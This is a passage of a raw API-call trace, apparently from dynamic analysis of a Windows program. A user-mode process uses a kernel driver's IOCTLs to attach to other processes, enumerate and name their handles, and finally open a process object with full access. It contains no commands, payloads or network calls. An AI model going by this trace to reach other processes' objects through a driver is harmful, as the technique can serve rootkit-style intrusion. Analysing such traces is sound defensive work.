lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0224.051] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.051] PsAcquireProcessExitSynchronization () returned 0x0 [0224.051] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.051] ObReferenceObjectByHandle (in: Handle=0x954, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003992f20, HandleInformation=0x0) returned 0x0 [0224.051] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.051] PsReleaseProcessExitSynchronization () returned 0x2 [0224.051] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.052] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.052] ObfDereferenceObject (Object=0xfffffa8003992f20) returned 0x12 [0224.052] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.052] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.052] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.052] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0224.052] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.052] PsAcquireProcessExitSynchronization () returned 0x0 [0224.052] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.052] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003992210, HandleInformation=0x0) returned 0x0 [0224.052] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.052] PsReleaseProcessExitSynchronization () returned 0x2 [0224.052] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.052] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.052] ObfDereferenceObject (Object=0xfffffa8003992210) returned 0x12 [0224.052] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.052] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.052] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.052] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0224.052] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.052] PsAcquireProcessExitSynchronization () returned 0x0 [0224.052] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.052] ObReferenceObjectByHandle (in: Handle=0x95c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003992530, HandleInformation=0x0) returned 0x0 [0224.052] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.052] PsReleaseProcessExitSynchronization () returned 0x2 [0224.052] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.052] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.053] ObfDereferenceObject (Object=0xfffffa8003992530) returned 0x12 [0224.053] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.053] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.053] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.053] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0224.053] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.053] PsAcquireProcessExitSynchronization () returned 0x0 [0224.053] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.053] ObReferenceObjectByHandle (in: Handle=0x960, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003992680, HandleInformation=0x0) returned 0x0 [0224.053] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.053] PsReleaseProcessExitSynchronization () returned 0x2 [0224.053] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.053] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.053] ObfDereferenceObject (Object=0xfffffa8003992680) returned 0x10 [0224.053] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.053] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.053] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.053] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0224.053] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.053] PsAcquireProcessExitSynchronization () returned 0x0 [0224.053] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.053] ObReferenceObjectByHandle (in: Handle=0x964, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039923e0, HandleInformation=0x0) returned 0x0 [0224.053] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.053] PsReleaseProcessExitSynchronization () returned 0x2 [0224.053] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.053] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.053] ObfDereferenceObject (Object=0xfffffa80039923e0) returned 0x18 [0224.053] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.053] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.053] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.054] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.054] PsAcquireProcessExitSynchronization () returned 0x0 [0224.054] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.054] ObReferenceObjectByHandle (in: Handle=0x9a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034b7070, HandleInformation=0x0) returned 0x0 [0224.054] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.054] PsReleaseProcessExitSynchronization () returned 0x2 [0224.054] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.054] ObQueryNameString (in: Object=0xfffffa80034b7070, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.054] ObfDereferenceObject (Object=0xfffffa80034b7070) returned 0x1 [0224.054] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.054] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.054] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.054] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.054] PsAcquireProcessExitSynchronization () returned 0x0 [0224.054] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.054] ObReferenceObjectByHandle (in: Handle=0xa78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034f5070, HandleInformation=0x0) returned 0x0 [0224.054] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.054] PsReleaseProcessExitSynchronization () returned 0x2 [0224.054] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.054] ObQueryNameString (in: Object=0xfffffa80034f5070, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.054] ObfDereferenceObject (Object=0xfffffa80034f5070) returned 0x1 [0224.054] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.054] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.054] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0224.054] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.054] PsAcquireProcessExitSynchronization () returned 0x0 [0224.054] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.055] ObReferenceObjectByHandle (in: Handle=0xba0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a2b960, HandleInformation=0x0) returned 0x0 [0224.055] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.055] PsReleaseProcessExitSynchronization () returned 0x2 [0224.055] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.055] ObQueryNameString (in: Object=0xfffffa8003a2b960, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.055] ObfDereferenceObject (Object=0xfffffa8003a2b960) returned 0x1 [0224.055] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.055] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.055] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.055] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.055] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.055] PsAcquireProcessExitSynchronization () returned 0x0 [0224.055] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.055] ObReferenceObjectByHandle (in: Handle=0xef4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800216b3b0, HandleInformation=0x0) returned 0x0 [0224.055] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.055] PsReleaseProcessExitSynchronization () returned 0x2 [0224.055] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.055] ObQueryNameString (in: Object=0xfffffa800216b3b0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.055] ObfDereferenceObject (Object=0xfffffa800216b3b0) returned 0x2 [0224.055] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.055] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.055] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.055] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0224.055] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.056] PsAcquireProcessExitSynchronization () returned 0x0 [0224.056] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0224.056] ObReferenceObjectByHandle (in: Handle=0x1048, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002872240, HandleInformation=0x0) returned 0x0 [0224.056] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.056] PsReleaseProcessExitSynchronization () returned 0x2 [0224.056] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0224.056] ObQueryNameString (in: Object=0xfffffa8002872240, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.056] ObfDereferenceObject (Object=0xfffffa8002872240) returned 0x2 [0224.056] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.056] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0224.056] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.056] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0224.056] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.056] PsAcquireProcessExitSynchronization () returned 0x0 [0224.056] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0) [0224.056] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003847900, HandleInformation=0x0) returned 0x0 [0224.056] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.056] PsReleaseProcessExitSynchronization () returned 0x2 [0224.056] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0224.056] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.056] ObfDereferenceObject (Object=0xfffffa8003847900) returned 0x1 [0224.056] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.056] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.056] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.056] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0224.056] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.056] PsAcquireProcessExitSynchronization () returned 0x0 [0224.056] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0) [0224.057] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003848c40, HandleInformation=0x0) returned 0x0 [0224.057] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.057] PsReleaseProcessExitSynchronization () returned 0x2 [0224.057] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0224.057] ObQueryNameString (in: Object=0xfffffa8003848c40, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.057] ObfDereferenceObject (Object=0xfffffa8003848c40) returned 0x11 [0224.057] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.057] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.057] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.057] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0224.057] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.057] PsAcquireProcessExitSynchronization () returned 0x0 [0224.057] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0) [0224.057] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800384cc80, HandleInformation=0x0) returned 0x0 [0224.057] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.057] PsReleaseProcessExitSynchronization () returned 0x2 [0224.057] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0224.057] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.057] ObfDereferenceObject (Object=0xfffffa800384cc80) returned 0x1 [0224.057] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.057] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.057] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.057] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.057] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.057] PsAcquireProcessExitSynchronization () returned 0x0 [0224.057] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0) [0224.057] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.058] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.058] PsReleaseProcessExitSynchronization () returned 0x2 [0224.058] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0224.058] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.058] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.058] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.058] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.058] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.058] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.058] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.058] PsAcquireProcessExitSynchronization () returned 0x0 [0224.058] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880052b35d0) [0224.058] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.058] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.058] PsReleaseProcessExitSynchronization () returned 0x2 [0224.058] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0224.058] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.058] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.058] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.058] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc8) returned 0xc8 [0224.058] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0224.058] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80038b5b30, HandleInformation=0x0) returned 0x0 [0224.058] ObOpenObjectByPointer (in: Object=0xfffffa80038b5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: 